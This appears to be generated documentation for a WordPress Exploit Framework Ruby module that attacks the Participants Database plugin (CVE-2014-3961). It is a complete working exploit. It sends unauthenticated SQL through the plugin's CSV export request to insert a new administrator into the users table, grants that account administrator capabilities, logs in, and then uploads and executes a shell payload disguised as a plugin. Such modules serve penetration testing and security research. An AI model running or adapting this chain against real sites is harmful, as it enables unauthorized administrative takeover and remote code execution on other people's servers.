class Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'Participants Database <= 1.5.4.8 Shell Upload',
    desc: %(
      In versions <= 1.5.4.8 of the Participants Database, anonymous users
      are able to execute arbitrary SQL statements. This module utilises
      this vulnerability to create a new admin user and upload a payload
      masked as a plugin.
    ),
    author: [
      'Yarubo Research Team', # Vulnerability discovery
      'rastating'             # WPXF module
    ],
    references: [
      ['CVE', '2014-3961'],
      ['WPVDB', '7247'],
      ['EDB', '33613']
    ],
    date: 'Aug 01 2014'
  )

  register_options([
    StringOption.new(
      name: 'sign_up_path',
      desc: 'The relative path of the Participants Database sign up page',
      required: true
    ),
    StringOption.new(
      name: 'wp_prefix',
      desc: 'The database table prefix. Default: wp_',
      required: true,
      default: 'wp_'
    ),
    IntegerOption.new(
      name: 'user_id',
      desc: 'The ID number to use for the new admin account',
      required: true,
      default: (60_000..90_000).to_a.sample
    ),
    StringOption.new(
      name: 'username',
      desc: 'The username to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to use for the new admin account',
      required: true,
      default: Utility::Text.rand_alpha(6)
    ),
    StringOption.new(
      name: 'email',
      desc: 'The e-mail address to use for the new admin account',
      required: true,
      default: Utility::Text.rand_email
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 69
def check
  check_plugin_version_from_readme('participants-database', '1.5.4.9')
end
execute_payload() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 134
def execute_payload
  emit_info 'Uploading the payload...'
  cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  res = upload_payload_as_plugin_and_execute(Utility::Text.rand_alpha(6), Utility::Text.rand_alpha(6), cookie)
  res&.code != 404
end
execute_sql_query(query) click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 118
def execute_sql_query(query)
  builder = Utility::BodyBuilder.new
  builder.add_field('action', 'output CSV')
  builder.add_field('subsource', 'participants-database')
  builder.add_field('CSV_type', 'participant list')
  builder.add_field('query', query)

  builder.create do |body|
    execute_post_request(url: sign_up_url, body: body)
  end
end
hexified_email() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 93
def hexified_email
  "0x#{Utility::Text.hexify_string(datastore['email'])}"
end
hexified_password_hash() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 89
def hexified_password_hash
  "0x#{Utility::Text.hexify_string(password_hash)}"
end
hexified_username() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 81
def hexified_username
  "0x#{Utility::Text.hexify_string(datastore['username'])}"
end
new_user_sql() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 101
def new_user_sql
  [
    "insert into #{table_name('users')}",
    '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)',
    'values',
    "(#{user_id}, #{hexified_username}, #{hexified_password_hash}, #{hexified_username}, #{hexified_email}, 0, #{hexified_username});"
  ].join(' ')
end
password_hash() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 85
def password_hash
  Utility::Text.md5(datastore['password'])
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 141
def run
  return false unless super

  emit_info 'Creating a new user...'
  execute_sql_query(new_user_sql)

  emit_info 'Elevating user privileges...'
  update_user_meta('wp_user_level', '10')
  update_user_meta('wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')

  execute_payload
end
sign_up_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 73
def sign_up_url
  normalize_uri(full_uri, datastore['sign_up_path'])
end
table_name(name) click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 97
def table_name(name)
  "#{datastore['wp_prefix']}#{name}"
end
update_user_meta(key, value) click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 130
def update_user_meta(key, value)
  execute_sql_query(user_meta_sql(key, value))
end
user_id() click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 77
def user_id
  normalized_option_value('user_id')
end
user_meta_sql(key, value) click to toggle source
# File lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb, line 110
def user_meta_sql(key, value)
  [
    "insert into #{table_name('usermeta')}",
    '(user_id, meta_key, meta_value) values',
    "(#{user_id}, 0x#{Utility::Text.hexify_string(key)}, 0x#{Utility::Text.hexify_string(value)})"
  ].join(' ')
end